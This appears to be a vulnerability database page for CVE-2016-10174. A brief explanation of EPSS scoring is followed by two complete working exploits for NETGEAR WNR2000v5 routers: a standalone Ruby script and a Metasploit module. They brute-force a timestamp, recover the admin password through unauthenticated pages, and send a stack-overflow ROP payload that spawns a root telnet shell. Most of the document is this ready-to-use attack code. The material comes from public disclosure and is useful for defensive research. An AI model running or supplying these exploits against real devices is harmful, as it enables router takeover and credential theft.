CVE-2016-10174 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# # Remote code execution in NETGEAR WNR2000v5 # - by Pedro Ribeiro ([email protected]) / Agile Information Security # Released on 20/12/2016 # # NOTE: this exploit is "alpha" quality and has been deprecated. Please see the modules # accepted into the Metasploit framework, or https://github.com/pedrib/PoC/tree/master/exploits/metasploit/wnr2000 # # # TODO: # - randomise payload require 'net/http' require 'uri' require 'time' require 'digest' require 'openssl' require 'socket' #################### # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c # and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c TYPE_3 = 3 BREAK_3 = 128 DEG_3 = 31 SEP_3 = 3 @randtbl = [ # we omit TYPE_3 from here, not needed -1726662223, 379960547, 1735697613, 1040273694, 1313901226, 1627687941, -179304937, -2073333483, 1780058412, -1989503057, -615974602, 344556628, 939512070, -1249116260, 1507946756, -812545463, 154635395, 1388815473, -1926676823, 525320961, -1009028674, 968117788, -123449607, 1284210865, 435012392, -2017506339, -911064859, -370259173, 1132637927, 1398500161, -205601318, ] @unsafe_state = { "fptr" => SEP_3, "rptr" => 0, "state" => 0, "rand_type" => TYPE_3, "rand_deg" => DEG_3, "rand_sep" => SEP_3, "end_ptr" => DEG_3 } # Emulate the behaviour of C's srand def srandom_r (seed) state = @randtbl if seed == 0 seed = 1 end state[0] = seed dst = 0 word = seed kc = DEG_3 for i in 1..(kc-1) hi = word / 127773 lo = word % 127773 word = 16807 * lo - 2836 * hi if (word < 0) word += 2147483647 end dst += 1 state[dst] = word end @unsafe_state['fptr'] = @unsafe_state['rand_sep'] @unsafe_state['rptr'] = 0 kc *= 10 kc -= 1 while (kc >= 0) random_r kc -= 1 end end # Emulate the behaviour of C's rand def random_r buf = @unsafe_state state = buf['state'] fptr = buf['fptr'] rptr = buf['rptr'] end_ptr = buf['end_ptr'] val = @randtbl[fptr] += @randtbl[rptr] result = (val >> 1) & 0x7fffffff fptr += 1 if (fptr >= end_ptr) fptr = state rptr += 1 else rptr += 1 if (rptr >= end_ptr) rptr = state end end buf['fptr'] = fptr buf['rptr'] = rptr result end ##################### ##################### # Ruby code ported from https://github.com/insanid/netgear-telenetenable # def telnetenable (username, password) mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00") username_pad = username.ljust(0x10, "\x00") password_pad = password.ljust(0x21, "\x00") cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00") md5 = Digest::MD5.new md5.update(cleartext) payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*') secret_key = "AMBIT_TELNET_ENABLE+" + password cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt cipher.key_len = secret_key.length cipher.key = secret_key cipher.padding = 0 binary_data = (cipher.update(payload) << cipher.final) s = UDPSocket.new s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23) end ##################### # Do some crazyness to force Ruby to cast to a single-precision float and # back to an integer. # This emulates the behaviour of the soft-fp library and the float cast # which is done at the end of Netgear's timestamp generator. def ieee754_round (number) [number].pack('f').unpack('f*')[0].to_i end # This is the actual algorithm used in the get_timestamp function in # the Netgear firmware. def get_timestamp(time) srandom_r time t0 = random_r t1 = 0x17dc65df; hi = (t0 * t1) >> 32; t2 = t0 >> 31; t3 = hi >> 23; t3 = t3 - t2; t4 = t3 * 0x55d4a80; t0 = t0 - t4; t0 = t0 + 0x989680; ieee754_round(t0) end # Default credentials for the router USERNAME = "admin" PASSWORD = "password" def get_request(uri_str) uri = URI.parse(uri_str) http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) request = Net::HTTP::Get.new(uri.request_uri) request.basic_auth(USERNAME, PASSWORD) http.request(request) end def post_request(uri_str, body) uri = URI.parse(uri_str) header = { 'Content-Type' => 'application/x-www-form-urlencoded' } http = Net::HTTP.new(uri.host, uri.port) #http.set_debug_output($stdout) request = Net::HTTP::Post.new(uri.request_uri, header) request.basic_auth(USERNAME, PASSWORD) request.body = body http.request(request) end def check response = get_request("http://#{@target}/") auth = response['WWW-Authenticate'] if auth != nil if auth =~ /WNR2000v5/ puts "[+] Router is vulnerable and exploitable (WNR2000v5)." return elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)." return end end puts "Router is not vulnerable." end def get_password response = get_request("http://#{@target}/BRS_netgear_success.html") if response.body =~ /var sn="([\w]*)";/ serial = $1 else puts "[-]Failed to obtain serial number, bailing out..." exit(1) end # 1: send serial number response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+") # 2: send answer to secret questions response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \ "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+") # 3: PROFIT!!! response = get_request("http://#{@target}/passwordrecovered.cgi") if response.body =~ /Admin Password: (.*)<\/TD>/ password = $1 else puts "[-] Failed to obtain admin password, bailing out..." exit(1) end if response.body =~ /Admin Username: (.*)<\/TD>/ username = $1 else puts "[-] Failed to obtain admin username, bailing out..." exit(1) end puts "[+] Success! Got admin username #{username} and password #{password}" return [username, password] end def get_current_time response = get_request("http://#{@target}/") date = response['Date'] Time.parse(date).strftime('%s').to_i end def get_auth_timestamp(mode) if mode == "bof" uri_str = "http://#{@target}/lang_check.html" else uri_str = "http://#{@target}/PWD_password.htm" end response = get_request(uri_str) if response.code == 401 # try again, might fail the first time response = get_request(uri_str) if response.code == 200 if response.body =~ /timestamp=([0-9]{8})/ $1.to_i end end end end def got_shell puts "[+] Success, shell incoming!" exec("telnet #{@target.split(':')[0]}") end if ARGV.length < 2 puts "Usage: ./netgearPwn.rb <IP:PORT> <check|bof|telnet <MAC>> [noreboot]" puts "\tcheck: see if the target is vulnerable" puts "\tbof: run buffer overflow exploit on the target" puts "\ttelnet <mac>: run telnet exploit on the target, needs MAC address" puts "\tnoreboot: optional parameter - don't force a reboot on the target" exit(1) end @target = ARGV[0] mode = ARGV[1] if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot") reboot = false else reboot = true end if mode == "telnet" if ARGV.length == 3 @mac = ARGV[2] elsif ARGV.length == 4 @mac = ARGV[3] else puts "[-] telnet mode needs MAC address argument!" exit(-1) end end # Maximum time differential to try # Look 5000 seconds back for the timestamp with reboot # 500000 with no reboot if reboot TIME_OFFSET = 5000 else TIME_OFFSET = 500000 end # Increase this if you're sure the device is vulnerable and you're not getting a shell TIME_SURPLUS = 200 if mode == "check" check exit(0) end if mode == "bof" def uri_encode (str) "%" + str.scan(/.{2}|.+/).join("%") end def calc_address (libc_base, offset) addr = (libc_base + offset).to_s(16) uri_encode(addr) end system_offset = 0x547D0 gadget = 0x2462C libc_base = 0x2ab24000 payload = 'a' * 36 + # filler_1 calc_address(libc_base, system_offset) + # s0 '1111' + # s1 '2222' + # s2 '3333' + # s3 calc_address(libc_base, gadget) + # gadget 'b' * 0x40 + # filler_2 "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload end # 0: try to see if the default admin username and password are set timestamp = get_auth_timestamp(mode) # 1: reboot the router to get it to generate new timestamps if reboot and timestamp == nil response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes") if response.code == "200" puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..." sleep 120 puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply." sleep 60 else puts "[-] Failed to reboot the router. Bailing out." exit(-1) end puts "[*] Proceeding..." end # 2: get the current date from the router and parse it, but only if we are not authenticated... if timestamp == nil end_time = get_current_time if end_time <= TIME_OFFSET start_time = 0 else start_time = end_time - TIME_OFFSET end end_time += TIME_SURPLUS if end_time < (TIME_SURPLUS * 7.5).to_i end_time = (TIME_SURPLUS * 7.5).to_i end puts "[+] Got time #{end_time} from router, starting exploitation attempt." puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)." end if mode == "bof" uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp=" body = "submit_flag=select_language&hidden_lang_avi=#{payload}" else uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp=" body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2" end # 3: work back from the current router time minus TIME_OFFSET while true for time in end_time.downto(start_time) begin if timestamp == nil response = post_request(uri_str + get_timestamp(time).to_s, body) else response = post_request(uri_str + timestamp.to_s, body) end if response.code == "200" # this only occurs in the telnet case credentials = get_password telnetenable(credentials[0], credentials[1]) sleep 5 got_shell #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}" #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!" exit(0) end rescue EOFError if reboot sleep 0.2 else # with no reboot we give the router more time to breathe sleep 0.5 end begin s = TCPSocket.new(@target.split(':')[0], 23) s.close got_shell rescue Errno::ECONNREFUSED if timestamp != nil # this is the case where we can get an authenticated timestamp but we could not execute code # IT SHOULD NEVER HAPPEN # But scream and continue just in case, it means there is a bug puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code." puts "[*] Let's try again..." timestamp = get_auth_timestamp end next end rescue Net::ReadTimeout # for bof case, we land here got_shell end end if timestamp == nil start_time = end_time - (TIME_SURPLUS * 5) end_time = end_time + (TIME_SURPLUS * 5) puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}" end end # If we get here then the exploit failed puts "[-] Exploit finished. Failed to get a shell!"

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'time' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CRand def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow', 'Description' => %q{ The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp which is in the configuration of the router. An authenticated attacker can simply fetch this from a page, but an unauthenticated attacker has to brute force it. Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but it is guaranteed that it can be bruteforced. This module implements both modes, and it works very reliably. It has been tested with the WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware revisions v4 and v3, but this has not been tested - with these routers it might be necessary to adjust the LibcBase variable as well as the gadget addresses. }, 'Author' => [ 'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => ['unix'], 'References' => [ ['CVE', '2016-10174'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'], ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability'] ], 'Targets' => [ [ 'NETGEAR WNR2000v5', { 'LibcBase' => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so) 'SystemOffset' => 0x547D0, 'GadgetOffset' => 0x2462C, #The ROP gadget will load $sp into $a0 (which will contain the system() command) and call $s0 (which will contain the address of system()): #LOAD:0002462C addiu $a0, $sp, 0x40+arg_0 #LOAD:00024630 move $t9, $s0 #LOAD:00024634 jalr $t9 'Payload' => { 'BadChars' => "\x00\x25\x26", 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, } ], ], 'Privileged' => true, 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DisclosureDate' => 'Dec 20 2016', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']), OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']), ], self.class) register_advanced_options( [ OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]), OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200]) ], self.class) end def check res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers['WWW-Authenticate'] auth = res.headers['WWW-Authenticate'] if auth =~ /WNR2000v5/ return Exploit::CheckCode::Detected elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/ return Exploit::CheckCode::Unknown end end Exploit::CheckCode::Safe end def uri_encode (str) "%" + str.scan(/.{2}|.+/).join("%") end def calc_address (libc_base, offset) addr = (libc_base + offset).to_s(16) uri_encode(addr) end def get_current_time res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res['Date'] date = res['Date'] return Time.parse(date).strftime('%s').to_i end end def get_auth_timestamp res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) if res && res.code == 401 # try again, might fail the first time res = send_request_raw({ 'uri' => '/lang_check.html', 'method' => 'GET', # automatically uses HttpPassword and HttpUsername to authenticate }) end if res && res.code == 200 if res.body =~ /timestamp=([0-9]{8})/ $1.to_i end end end # Do some crazyness to force Ruby to cast to a single-precision float and # back to an integer. # This emulates the behaviour of the soft-fp library and the float cast # which is done at the end of Netgear's timestamp generator. def ieee754_round (number) [number].pack('f').unpack('f*')[0].to_i end # This is the actual algorithm used in the get_timestamp function in # the Netgear firmware. def get_timestamp(time) srandom_r time t0 = random_r t1 = 0x17dc65df; hi = (t0 * t1) >> 32; t2 = t0 >> 31; t3 = hi >> 23; t3 = t3 - t2; t4 = t3 * 0x55d4a80; t0 = t0 - t4; t0 = t0 + 0x989680; ieee754_round(t0) end def get_payload rand_text_alpha(36) + # filler_1 calc_address(target['LibcBase'], target['SystemOffset']) + # s0 rand_text_alpha(12) + # s1, s2 and s3 calc_address(target['LibcBase'], target['GadgetOffset']) + # gadget rand_text_alpha(0x40) + # filler_2 "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload end def send_req(timestamp) begin uri_str = (timestamp == nil ? \ "/apply_noauth.cgi?/lang_check.html" : \ "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}") res = send_request_raw({ 'uri' => uri_str, 'method' => 'POST', 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }, 'data' => "submit_flag=select_language&hidden_lang_avi=#{get_payload}" }) rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e return end end def exploit # 1: try to see if the default admin username and password are set timestamp = get_auth_timestamp # 2: now we try two things at once: # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before) print_status("#{peer} - Trying the easy way out first") send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if not sock.nil? print_good("#{peer} - Success, shell incoming!") return handler(sock) end rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock end print_bad("#{peer} - Well that didn't work... let's do it the hard way.") # no shell? let's just go on and bruteforce the timestamp # 3: get the current date from the router and parse it end_time = get_current_time if end_time.nil? fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time") end if end_time <= datastore['TIME_OFFSET'] start_time = 0 else start_time = end_time - datastore['TIME_OFFSET'] end end_time += datastore['TIME_SURPLUS'] if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i end print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.") print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).") # 2: work back from the current router time minus datastore['TIME_OFFSET'] while true for time in end_time.downto(start_time) timestamp = get_timestamp(time) sleep 0.1 if time % 400 == 0 print_status("#{peer} - Still working, trying time #{time}") end send_req(timestamp) begin ctx = { 'Msf' => framework, 'MsfExploit' => self } sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 }) if sock.nil? next end print_status("#{peer} - Success, shell incoming!") return handler(sock) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e sock.close if sock next end end end_time = start_time start_time -= datastore['TIME_OFFSET'] if start_time < 0 if end_time <= datastore['TIME_OFFSET'] fail_with(Failure::Unknown, "#{peer} - Exploit failed.") end start_time = 0 end print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}") # let the router clear the buffers a bit... sleep 30 end end end